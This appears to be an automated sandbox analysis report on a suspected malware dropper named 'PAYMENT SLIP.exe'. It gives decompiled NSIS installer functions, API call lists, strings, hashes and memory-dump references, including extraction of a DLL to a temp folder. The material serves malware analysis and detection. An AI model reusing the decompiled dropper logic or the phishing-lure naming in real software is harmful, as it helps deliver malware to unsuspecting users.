              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
              • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
              • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
              • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403C0B, Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E00403C0B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a274;
				_t22 = E00406931(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E0040640A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E0040640A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E00406483(L"1033", _t73 & 0x0000ffff);
				}
				E00403EE1(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42a300 =  *0x42a27c & 0x00000020;
				 *0x42a31c = 0x10000;
				if(E00405F19(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F19(_t98, _t86) == 0) {
						E00406579(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EE1(_t78, __eflags);
							__eflags =  *0x42a320;
							if( *0x42a320 != 0) {
								_t33 = E00405677(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5);
							_t39 = E004068C1("RichEd20");
							__eflags = _t39;
							if(_t39 == 0) {
								E004068C1("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E00403FB9, 0);
							E00403B5B(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E0040640A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a2b8 + _t78 * 2,  *0x42a2b8 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x4b
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405E3E(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653C(_t86, E00405E11(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E5D(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























              0x00403c11
              0x00403c1a
              0x00403c21
              0x00403c23
              0x00403c37
              0x00403c49
              0x00403c52
              0x00403c5b
              0x00403c62
              0x00403c67
              0x00403c6e
              0x00403c81
              0x00403c81
              0x00403c8c
              0x00403c25
              0x00403c25
              0x00403c30
              0x00403c30
              0x00403c91
              0x00403c9b
              0x00403ca4
              0x00403ca9
              0x00403cba
              0x00403d4c
              0x00403d54
              0x00403d5d
              0x00403d5d
              0x00403d73
              0x00403d79
              0x00403d87
              0x00403e08
              0x00403e10
              0x00403e1a
              0x00403e1f
              0x00403e25
              0x00403eaf
              0x00403eb4
              0x00403eb6
              0x00403ed2
              0x00000000
              0x00403ed2
              0x00403eb8
              0x00403ebe
              0x00403ec6
              0x00403ec6
              0x00000000
              0x00403ebe
              0x00403e33
              0x00403e3e
              0x00403e43
              0x00403e45
              0x00403e4c
              0x00403e4c
              0x00403e57
              0x00403e5f
              0x00403e61
              0x00403e63
              0x00403e6c
              0x00403e6f
              0x00403e75
              0x00403e75
              0x00403e94
              0x00403ea5
              0x00000000
              0x00403eaa
              0x00403e12
              0x00403e14
              0x00000000
              0x00403d89
              0x00403d89
              0x00403d95
              0x00403d9f
              0x00403da5
              0x00403daa
              0x00403db9
              0x00403ed7
              0x00403ed7
              0x00000000
              0x00403ed7
              0x00403dc8
              0x00403e03
              0x00000000
              0x00403e03
              0x00403cc0
              0x00403cc0
              0x00403cc3
              0x00403cc5
              0x00000000
              0x00000000
              0x00403cd3
              0x00403ce5
              0x00403cea
              0x00403cf3
              0x00000000
              0x00000000
              0x00403cf9
              0x00403cfb
              0x00403d08
              0x00403d08
              0x00403d11
              0x00403d17
              0x00403d3f
              0x00403d47
              0x00000000
              0x00403d29
              0x00403d2a
              0x00403d33
              0x00403d39
              0x00403d3a
              0x00000000
              0x00403d3a
              0x00403d35
              0x00403d37
              0x00000000
              0x00000000
              0x00000000
              0x00403d37
              0x00403d17

              APIs
                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
              • GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,00000000), ref: 00403C25
                • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
              • lstrcatW.KERNEL32(1033,00423748), ref: 00403C8C
              • lstrlenW.KERNEL32(KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,73BCFAA0), ref: 00403D0C
              • lstrcmpiW.KERNEL32(?,.exe,KXCJDFJSKF,?,?,?,KXCJDFJSKF,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
              • GetFileAttributesW.KERNEL32(KXCJDFJSKF), ref: 00403D2A
              • LoadImageW.USER32 ref: 00403D73
              • RegisterClassW.USER32 ref: 00403DB0
              • SystemParametersInfoW.USER32 ref: 00403DC8
              • CreateWindowExW.USER32 ref: 00403DFD
              • ShowWindow.USER32(00000005,00000000), ref: 00403E33
              • GetClassInfoW.USER32 ref: 00403E5F
              • GetClassInfoW.USER32 ref: 00403E6C
              • RegisterClassW.USER32 ref: 00403E75
              • DialogBoxParamW.USER32 ref: 00403E94
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$KXCJDFJSKF$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
              • API String ID: 606308-2237092416
              • Opcode ID: e72121f9318e9a8d3ba69cbfb00b5424d628858843ee7b3eb32a151408395cbd
              • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
              • Opcode Fuzzy Hash: e72121f9318e9a8d3ba69cbfb00b5424d628858843ee7b3eb32a151408395cbd
              • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403068, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 99%
              			E00403068(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a270 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe", 0x400);
				_t106 = E00406032(L"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653C(0x436800, L"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe");
				E0040653C(0x439000, E00405E5D(0x436800));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402FC6(1);
					__eflags =  *0x42a278 - _t94;
					if( *0x42a278 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406A8C(0x40ce68);
						E00406061(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403590( *0x42a278 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403309(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a274 = _t111;
								 *0x42a27c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a280 =  *0x42a280 + 1;
									__eflags =  *0x42a280;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x420ef4; // 0x3770f
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00405FED(0x42a2a0, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403590( *0x420ef0);
					_t77 = E0040357A( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a278) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E0040357A(0x418ef0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402FC6(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a278;
						if( *0x42a278 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402FC6(0);
							}
							goto L20;
						}
						E00405FED( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x420ef0; // 0x2f5b0
						 *0x42a320 =  *0x42a320 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x42a278 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x420f00; // 0x31437
						if(__eflags < 0) {
							_v8 = E00406A1E(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}
































              0x00403073
              0x00403076
              0x00403079
              0x00403093
              0x00403098
              0x004030ab
              0x004030b0
              0x004030b6
              0x00000000
              0x004030b8
              0x004030c9
              0x004030da
              0x004030e1
              0x004030e7
              0x004030e9
              0x004030ee
              0x004030f0
              0x004031db
              0x004031dd
              0x004031e2
              0x004031e9
              0x00000000
              0x00000000
              0x004031ef
              0x004031f2
              0x0040321e
              0x00403223
              0x0040322e
              0x00403230
              0x00403241
              0x0040325c
              0x00403262
              0x00403265
              0x0040326a
              0x00403289
              0x00403299
              0x004032ab
              0x004032b0
              0x004032b5
              0x004032b8
              0x004032c1
              0x004032c5
              0x004032cd
              0x004032d2
              0x004032d4
              0x004032d4
              0x004032d4
              0x004032dc
              0x004032dc
              0x004032df
              0x004032e0
              0x004032e0
              0x004032e3
              0x004032e5
              0x004032e5
              0x004032e5
              0x004032e8
              0x004032ef
              0x004032fb
              0x00403300
              0x00000000
              0x00403300
              0x00000000
              0x004032b8
              0x00000000
              0x0040326c
              0x004031fa
              0x00403205
              0x0040320a
              0x0040320c
              0x00000000
              0x00000000
              0x00403215
              0x00403218
              0x00000000
              0x00000000
              0x00000000
              0x004030f6
              0x004030fb
              0x00403100
              0x00403104
              0x0040310b
              0x00403110
              0x00403112
              0x00403114
              0x00403114
              0x00403118
              0x0040311d
              0x0040311f
              0x00403278
              0x004032ba
              0x00000000
              0x004032ba
              0x00403125
              0x0040312c
              0x004031a8
              0x004031ac
              0x004031b0
              0x004031b5
              0x00000000
              0x004031ac
              0x00403135
              0x0040313a
              0x0040313d
              0x00403142
              0x00000000
              0x00000000
              0x00403144
              0x0040314b
              0x00000000
              0x00000000
              0x0040314d
              0x00403154
              0x00000000
              0x00000000
              0x00403156
              0x0040315d
              0x00000000
              0x00000000
              0x0040315f
              0x00403166
              0x00000000
              0x00000000
              0x00403168
              0x0040316e
              0x00403177
              0x0040317d
              0x00403180
              0x00403182
              0x00403188
              0x00000000
              0x00000000
              0x0040318e
              0x00403192
              0x0040319a
              0x0040319a
              0x0040319d
              0x004031a0
              0x004031a2
              0x004031a4
              0x004031a4
              0x00000000
              0x004031a2
              0x00403194
              0x00403198
              0x00000000
              0x00000000
              0x00000000
              0x004031b6
              0x004031b6
              0x004031bc
              0x004031c8
              0x004031c8
              0x004031cb
              0x004031d1
              0x004031d1
              0x004031d1
              0x004031d9
              0x004031d9
              0x00000000
              0x004031d9

              APIs
              • GetTickCount.KERNEL32 ref: 0040307C
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PAYMENT SLIP.exe,00000400), ref: 00403098
                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\PAYMENT SLIP.exe,80000000,00000003), ref: 00406036
                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\PAYMENT SLIP.exe,C:\Users\user\Desktop\PAYMENT SLIP.exe,80000000,00000003), ref: 004030E1
              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403223
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403072, 0040323B
              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004032BA
              • C:\Users\user\Desktop\PAYMENT SLIP.exe, xrefs: 00403082, 00403091, 004030A5, 004030C2
              • soft, xrefs: 00403156
              • Null, xrefs: 0040315F
              • Error launching installer, xrefs: 004030B8
              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040326C
              • "C:\Users\user\Desktop\PAYMENT SLIP.exe" , xrefs: 00403068
              • Inst, xrefs: 0040314D
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\PAYMENT SLIP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
              • API String ID: 2803837635-1522885949
              • Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
              • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
              • Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
              • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B11450, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 461memoryfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B1126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 00B1128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00B118E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B11960
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: 1fd492af7bede425cca05e95a1c3dd708253566e77f8f832932e1e5fa3e89b85
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: FE025B25E54398E9EB61CBE4EC16BEDB7B5AF04B10F5044CAE608FA1D1D3B10AC4DB16
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040176F, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402D3E(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E88( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"KXCJ";
				if(_t35 == 0) {
					lstrcatW(E00405E11(E0040653C(_t81, 0x436000)), ??);
				} else {
					E0040653C();
				}
				E004067EB(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040689A(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E0040600D(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406032(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004055A4(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a308;
						goto L32;
					} else {
						E0040653C(0x40b5f8, _t83);
						E0040653C(_t83, _t81);
						E00406579(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653C(_t83, 0x40b5f8);
						_t64 = E00405BA2("C:\Users\jones\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a308 =  &( *0x42a308->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004055A4();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004055A4(0xffffffea,  *(_t86 - 8));
				 *0x42a334 =  *0x42a334 + 1;
				_t45 = E00403309(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a334 =  *0x42a334 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406579(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406579(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405BA2();
					goto L29;
				}
				goto L33;
			}


















              0x0040176f
              0x00401776
              0x00401782
              0x00401785
              0x0040178a
              0x0040178d
              0x00401794
              0x004017b0
              0x00401796
              0x00401797
              0x00401797
              0x004017b6
              0x004017bb
              0x004017bb
              0x004017bf
              0x004017c2
              0x004017c7
              0x004017c9
              0x004017cb
              0x004017d0
              0x004017d0
              0x004017db
              0x004017db
              0x004017ec
              0x004017ee
              0x004017ee
              0x004017ef
              0x004017ef
              0x004017f2
              0x004017f5
              0x004017f8
              0x004017f8
              0x004017ff
              0x0040180e
              0x00401813
              0x00401816
              0x00401819
              0x00000000
              0x00000000
              0x0040181b
              0x0040181e
              0x00401874
              0x00401879
              0x004015b6
              0x00402925
              0x00402925
              0x00402bc2
              0x00402bc5
              0x00402bc5
              0x00000000
              0x00401820
              0x00401826
              0x0040182d
              0x0040183a
              0x00401845
              0x0040185b
              0x0040185b
              0x0040185e
              0x00000000
              0x00401864
              0x00401864
              0x00401865
              0x00401882
              0x00402bcb
              0x00402bcb
              0x00402bcb
              0x00401867
              0x00401867
              0x00401868
              0x00401493
              0x00402395
              0x00402395
              0x00402395
              0x00401865
              0x0040185e
              0x00402bcd
              0x00402bd1
              0x00402bd1
              0x00401892
              0x00401897
              0x004018a5
              0x004018aa
              0x004018b0
              0x004018b4
              0x004018b6
              0x004018be
              0x004018ca
              0x004018b8
              0x004018b8
              0x004018bc
              0x00000000
              0x00000000
              0x004018bc
              0x004018d3
              0x004018d9
              0x004018db
              0x00000000
              0x004018e1
              0x004018e1
              0x004018e4
              0x004018fc
              0x004018e6
              0x004018e9
              0x004018f2
              0x004018f2
              0x00401901
              0x00401906
              0x00402390
              0x00000000
              0x00402390
              0x00000000

              APIs
              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
              • CompareFileTime.KERNEL32(-00000014,?,KXCJDFJSKF,KXCJDFJSKF,00000000,00000000,KXCJDFJSKF,00436000,?,?,00000031), ref: 004017D5
